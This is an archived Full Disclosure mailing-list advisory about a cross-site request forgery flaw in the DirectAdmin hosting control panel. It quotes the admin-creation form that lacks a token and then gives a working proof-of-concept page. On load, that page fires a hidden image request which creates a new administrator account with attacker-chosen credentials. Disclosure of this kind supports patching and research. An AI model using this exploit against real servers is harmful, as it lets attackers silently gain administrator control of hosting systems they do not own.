[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] DirectAdmin (1.44.3) CSRF Vulnerability
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] DirectAdmin (1.44.3) CSRF Vulnerability
- From: Necmettin COŞKUN <h@xxxxxxx>
- Date: Sat, 10 Oct 2015 19:49:06 +0300
<div><p># Title : DirectAdmin (1.44.3) CSRF Vulnerability <br /># Date :
10-10-2015<br /># Version : 1.43.3-1.44.3<br /># Author : @babayarisi
http://ha.cker.io<br /># Vendor : http://www.directadmin.com/<br /># Download:
http://www.directadmin.com/demo.html<br
/>=============================================================================<br
/># info : DirectAdmin is a web-based hosting control panel.</p><p>#As you can
see original form doesn't include csrf protection or any secret token.<br
/><form name=reseller action="CMD_ACCOUNT_ADMIN" method="post"
onSubmit="return formOK()"><br /><input type=hidden name=action
value=create><br /><tr><td
class="list">Username:</td><td class="list"><input type=text
name=username maxlength=12 onChange="checkName()"></td></tr><br
/><tr><td class="list">E-Mail:</td><td
class="list"><input type=text name=email
onChange="checkEmail()"></td></tr><br /><tr><td
class="list">Enter Password:</td><td class="list"><input
type=password name=passwd> <input type=button value="Random"
onClick="randomPass()"></td></tr><br /><tr><td
class="list">Re-Enter Password:</td><td class="list"><input
type=password name=passwd2 onChange="checkPass()"></td></tr><br
/><tr><td class="list">Send Email Notification:</td><td
class="list"><input type=checkbox value="yes" name=notify checked>
<a href="javascript:showAdminMessage();">Edit Admin
Message</a></td></tr></p><p><tr><td td
class="listtitle" colspan=3 align=right><br /><input type=submit
value="Submit"><br /></td></tr><br /></form></p><p>#POC<br
/><html><br /><head><br /><title>POC</title><br
/></head><br /><script language="javascript"></p><p>function
yurudi(){<br />var adress ="www.demo.com";<br />var username="demo";<br />var
email ="demo@xxxxxxxx";<br />var password="12345";<br />var
urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password;</p><p>document.getElementById("resim").src=urlson;<br
/>}<br /></script></p><p><body onload="yurudi()"><br /><img
id="resim" src="" style="height:0px;width:0px;"></img><br
/></body><br /></html><br />#POC</p><p># don't be evil!</p></div>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/